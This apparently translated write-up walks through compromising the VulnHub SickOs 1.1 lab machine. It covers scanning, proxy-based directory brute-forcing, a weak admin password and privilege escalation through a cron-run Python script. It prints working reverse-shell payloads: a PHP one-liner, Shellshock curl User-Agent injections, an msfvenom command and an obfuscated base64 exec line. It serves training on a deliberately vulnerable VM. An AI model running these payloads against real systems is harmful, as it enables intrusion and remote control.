Table of contents
introduce
Series: SickOs (a total of 2 units in this series)
Release date: December 11, 2015
Difficulty: Elementary-Middle
Operating environment: VMware Workstation
Goal: Obtain root authority + Flag
learning:
- host discovery
- Port scanning + vulnerability scanning
- proxy scan
- Search the background of the website
- background write shell
- Scheduled task privilege escalation
- Shell vulnerability to take the shell
Target machine address: https://www.vulnhub.com/entry/sickos-11,132/
collect message
host information detection
netdiscover host discovery
sudo netdiscover -i eth0 -r 192.168.229.0/24
host information detection
It is found that there is a port 3128 related to the web, running squid/3.1.19. According to the search engine, squid is a proxy server and web cache server, mainly used in systems such as Unix.
nmap -p- 192.168.229.135
nmap -p 22,3128,8080 -A 192.168.229.135
nmap-p 22,3128,8080 --script=vuln 192.168.229.135
website detection
There is no valuable information in the web service, and direct directory blasting is also fruitless. A hyperlink in a web page, when clicked, opens the email software that comes with the computer. Since port 3128 is running a proxy service, try to use it as a proxy and re-detect the website.
So start directory blasting
dirsearch -u http://192.168.229.135 --full-url -R 2 -x 404 --exclude-sizes=0B --proxy=http://192.168.229.135:3128
After hooking up the proxy, nothing was found on the homepage of the website, and an interesting directory was found by visiting the blasted "/robots.txt"
Insert picture description here
I blasted this subdirectory twice, but found no meaningful directory. Google searched and found the background address:
In fact, if you notice the structure of the web page, you can directly jump to the background address if you modify it directly
Use the weak password admin, admin to log in directly
Getshell
MSF generates a php-type rebound shell code and pastes it into a certain page, but after getting the shell, the connection is disconnected, and it seems that a reverse shell command needs to be changed.
Do a Google search for "php reverse shell one liner" and you'll see a lot of simple and effective one-sentence trojans, such as:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.0.1/1234 0>&1'"); ?>
At this point, even though the browser is no longer loaded, my shell is not disconnected.
Sensitive Information Collection
A configuration file was directly found in the current directory, which contained a database password. According to the consistency of the target machine, this password should allow SSH to log in to the target machine. The inspection found that /home
there is only one directory under the directory: sickos
, so SSH logs in to the target machine
SUDO privilege escalation
The second way of customs clearance
nikto scan site
Nikto scans the website and finds that there is a suspected shell-breaking vulnerability
Verify shell vulnerability
In the previous target machine , both nmap and msf can be used to confirm whether there is a shell-breaking vulnerability. Here I tried to scan with a proxy, but it failed, so I had to confirm that there was a shell-breaking vulnerability and open it directly.
Blast /cgi-bin
the directory and find that there is a directory with a response code of 200, and the following directories have results:
- /cgi-bin/status
- /cgi-bin/status?full=true.sh
More directories have not been tested, it should be feasible
dirsearch -u http://192.168.229.135/cgi-bin/ --full-url -x 403 -f -e cgi,sh --proxy=http://192.168.229.135:3128
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://192.168.229.135/cgi-bin/status --proxy http://192.168.229.135:3128
shell exploit
# 检测有无 nc
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" http://192.168.229.135/cgi-bin/status?full=true.sh --proxy http://192.168.229.135:3128
# 命令执行,反弹bash shell
curl -H "user-agent: () { :; };/bin/bash -i >& /dev/tcp/192.168.229.128/4444 0>&1" http://192.168.229.135/cgi-bin/status?full=true.sh --proxy http://192.168.229.135:3128
A sensitive file was found, but it was not found in the scheduled task, maybe it was found in the wrong way.
Scheduled task privilege escalation
- Check the scheduled tasks and found a python script that looks like it can be used to schedule tasks to escalate privileges
- Generate python reverse shell command and write it into py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw
It is time to write the file into a mess, and the file cannot be edited normally. It stands to reason that even if there is a problem with the code, the correct code can be executed, but the shell is not received.
Fix file content confusion & privilege escalation
I found a customs clearance strategy on the Internet, and he solved it like this: https://www.cnblogs.com/henry666/p/16954510.html
Executing vim commands in a non-interactive Shell environment, some operations may be weird, For example, you cannot move the cursor up, down, left, or right. First enter o
the insert mode (insert a new line), then copy and paste, then press the **ESC**
+ in the upper right corner **wq**
, and finally press the Enter key.
But I have already messed up the content, and there is no way to fix it like that. It is also a way to manually repair the file by connecting to Ice Scorpion, but it is troublesome. Fortunately, this file is relatively simple:
- View the contents of this file to save valuable information:
#!/usr/bin/python
- Edit this file,
vim connect.py
once you open the file, press and hold on the keyboardd
, so that connect.py will be cleared, then save and exit - Re-edit this file, first enter
o
the insert mode (insert a new line), then paste , then press +#!/usr/bin/python
in the upper right corner , and finally press the Enter key.**ESC**
**wq**
- The next step is to add the payload, you can use the method in the previous step, or you can use the following method:
echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgjAUhf+K7GmDmG1oKLEHCYOICtJ30bVQsk289v9rLIu9eR/udg/fPWesew5mnAIw8qGmwNYqCODVDKORCmBWjLt9amtba2ASiKWcsk1COU8p4wnyEGsroiiOPRWES6LuwN8p21eHc17+8p1aXHbHqiiveXYivguVRmslJ4ztS+Y1G0l80gC9vQaOgd67XmmDyQyvl4JsKch9cBD/b6Sy7nuMwqbTYVNDi8gb7kNeeg==')[0])))" >> connect.py
Check and find that the content is correct, wait for a while, get the shell, and the privilege escalation is successful.